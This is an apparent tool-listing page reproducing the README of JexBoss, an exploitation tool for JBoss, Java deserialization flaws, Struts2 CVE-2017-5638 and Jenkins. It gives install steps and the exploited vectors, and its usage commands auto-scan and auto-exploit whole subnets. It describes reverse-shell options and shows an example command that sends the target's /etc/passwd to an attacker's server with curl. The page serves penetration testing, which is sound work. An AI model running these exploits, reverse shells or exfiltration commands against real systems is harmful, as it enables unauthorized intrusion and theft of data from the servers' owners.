logo
DATABASE RESOURCES PRICING ABOUT US

JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool

Description

JexBoss is a tool for testing and exploiting [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc. ** Requirements ** * Python >= 2.7.x * [ urllib3 ](<https://pypi.python.org/pypi/urllib3>) * [ ipaddress ](<https://pypi.python.org/pypi/ipaddress>) ** Installation on Linux\Mac ** To install the latest version of JexBoss, please use the following commands: git clone https://github.com/joaomatosf/jexboss.git cd jexboss pip install -r requires.txt python jexboss.py -h python jexboss.py -host http://target_host:8080 OR: Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip unzip master.zip cd jexboss-master pip install -r requires.txt python jexboss.py -h python jexboss.py -host http://target_host:8080 If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl: yum -y install centos-release-scl yum -y install python27 scl enable python27 bash ** Installation on Windows ** If you are using Windows, you can use the [ Git Bash ](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>) to run the JexBoss. Follow the steps below: * Download and install [ Python ](<https://www.python.org/downloads/release/python-2712/>) * Download and install [ Git for Windows ](<https://github.com/git-for-windows/git/releases/tag/v2.10.1.windows.1>) * After installing, run the Git for Windows and type the following commands: PATH=$PATH:C:\Python27\ PATH=$PATH:C:\Python27\Scripts git clone https://github.com/joaomatosf/jexboss.git cd jexboss pip install -r requires.txt python jexboss.py -h python jexboss.py -host http://target_host:8080 ** Features ** The tool and [ exploits ](<https://www.kitploit.com/search/label/Exploits>) were developed and tested for: * JBoss Application Server versions: 3, 4, 5 and 6. * Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc) The exploitation vectors are: * /admin-console * tested and working in JBoss versions 5 and 6 * /jmx-console * tested and working in JBoss versions 4, 5 and 6 * /web-console/Invoker * tested and working in JBoss versions 4, 5 and 6 * /invoker/JMXInvokerServlet * tested and working in JBoss versions 4, 5 and 6 * Application Deserialization * tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters * Servlet Deserialization * tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link) * Apache Struts2 CVE-2017-5638 * tested in [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 applications * Others ** Videos ** * Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss * Exploiting JBoss Application Server with JexBoss * Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638) ** Screenshots ** * Simple usage examples: $ python jexboss.py [ ![](https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s640/jexboss_4_simple_usage_help.png) ](<https://2.bp.blogspot.com/-alewUh8TXc0/Wi9wFJdgWpI/AAAAAAAAJo4/87dRBMNedWgmHohXnwzK2I0FJgcN0zBpwCLcBGAs/s1600/jexboss_4_simple_usage_help.png>) * Example of standalone mode against JBoss: $ python jexboss.py -u http://192.168.0.26:8080 [ ![](https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s640/jexboss_5_standalone_mode1.png) ](<https://3.bp.blogspot.com/-fvaYj-MWERY/Wi9wOYLDowI/AAAAAAAAJpA/5tecs4RFkyouaO4sQ20qq5gIgeHoc_VrgCLcBGAs/s1600/jexboss_5_standalone_mode1.png>) [ ![](https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s640/jexboss_6_standalone_mode2.png) ](<https://4.bp.blogspot.com/-ERfHzmOvIpE/Wi9wOQNN7EI/AAAAAAAAJo8/sng_9BGOMLo7wSDXuCz-7XyIKxkgkl6VwCLcBGAs/s1600/jexboss_6_standalone_mode2.png>) * Usage modes: $ python jexboss.py -h * Network scan mode: $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt [ ![](https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s640/jexboss_7_network_scan_mode.png) ](<https://4.bp.blogspot.com/-Hlq5rVHgHfI/Wi9wU1Z_sdI/AAAAAAAAJpE/Ep3uvTm2nM4A_doi2mJttKnPP3aqxM56gCLcBGAs/s1600/jexboss_7_network_scan_mode.png>) * Network scan with auto-exploit mode: $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt [ ![](https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s640/jexboss_8_scan_with_auto_exploit_mode.png) ](<https://1.bp.blogspot.com/-OFuKod1ko5Q/Wi9wb07NaYI/AAAAAAAAJpI/DR6ESX-6VikK_zs7vDilROlUvaLzEykrACLcBGAs/s1600/jexboss_8_scan_with_auto_exploit_mode.png>) * Results and recommendations: [ ![](https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s640/jexboss_9_results_and_recommendations2.png) ](<https://3.bp.blogspot.com/-a6A8GBdXzWw/Wi9wgd_s8gI/AAAAAAAAJpM/XarXTIL4-wUMpFJwIr-Q9wOYkil5w76vQCLcBGAs/s1600/jexboss_9_results_and_recommendations2.png>) ** Reverse Shell (meterpreter integration) ** After you exploit a JBoss server, you can use the own [ jexboss ](<https://www.kitploit.com/search/label/JexBoss>) command shell or perform a reverse connection using the following command: jexremote=YOUR_IP:YOUR_PORT Example: Shell>jexremote=192.168.0.10:4444 * Example: [ ](<https://github.com/joaomatosf/jexboss/raw/master/screenshots/jexbossreverse2.jpg>) [ ![](https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s640/jexboss_10_jexbossreverse2.jpeg) ](<https://4.bp.blogspot.com/-DTLzz6fknAc/Wi9wlav0sMI/AAAAAAAAJpQ/Au8e57VCaooIR0iX0fH3qqPHYZvsrDHoQCLcBGAs/s1600/jexboss_10_jexbossreverse2.jpeg>) When exploiting java deserialization [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities>) (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute. ** Usage examples ** * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server: $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl [email protected]/etc/passwd http://your_server' * For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host): $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name * For Java Deserialization Vulnerabilities in a Servlet (like Invoker): $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize * For [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 * For [ Apache Struts ](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 (CVE-2017-5638) with [ cookies ](<https://www.kitploit.com/search/label/Cookies>) for authenticated resources $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D" * Auto scan mode: $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log * File scan mode: $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log * More Options: optional arguments: -h, --help show this help message and exit --version show program's version number and exit --auto-exploit, -A Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!) --disable-check-updates, -D Disable two updates checks: 1) Check for updates performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt -mode {standalone,auto-scan,file-scan} Operation mode (DEFAULT: standalone) --app-unserialize, -j Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, oldFormData, etc) --servlet-unserialize, -l Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces) --jboss Check only for JBOSS vectors. --jenkins Check only for Jenkins CLI vector. --jmxtomcat Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be checked by default. --proxy PROXY, -P PROXY Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128) --proxy-cred LOGIN:PASS, -L LOGIN:PASS Proxy authentication credentials (eg -L name:password) --jboss-login LOGIN:PASS, -J LOGIN:PASS JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 (default: admin:admin) --timeout TIMEOUT Seconds to wait before timeout connection (default 3) Standalone mode: -host HOST, -u HOST Host address to be checked (eg. -u http://192.168.0.10:8080) Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER): --reverse-host RHOST:RPORT, -r RHOST:RPORT Remote host address and port for reverse shell when exploiting Java Deserialization Vulnerabilities in application layer (for now, working only against *nix systems)(eg. 192.168.0.10:1331) --cmd CMD, -x CMD Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server) --windows, -w Specifies that the commands are for rWINDOWS System$ (cmd.exe) --post-parameter PARAMETER, -H PARAMETER Specify the parameter to find and inject serialized objects into it. (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others) (DEFAULT: javax.faces.ViewState) --show-payload, -t Print the generated payload. --gadget {commons-collections3.1,commons-collections4.0,groovy1} Specify the type of Gadget to generate the payload automatically. (DEFAULT: commons-collections3.1 or groovy1 for JenKins) --load-gadget FILENAME Provide your own gadget from file (a java serialized object in RAW mode) --force, -F Force send java serialized gadgets to URL informed in -u parameter. This will send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with different Content-Types. Auto scan mode: -network NETWORK Network to be checked in CIDR format (eg. 10.0.0.0/8) -ports PORTS List of ports separated by commas to be checked for each host (eg. 8080,8443,8888,80,443) -results FILENAME File name to store the auto scan results File scan mode: -file FILENAME_HOSTS Filename with host list to be scanned (one host per line) -out FILENAME_RESULTS File name to store the file scan results ** [ Download JexBoss ](<https://github.com/joaomatosf/jexboss>) **


Related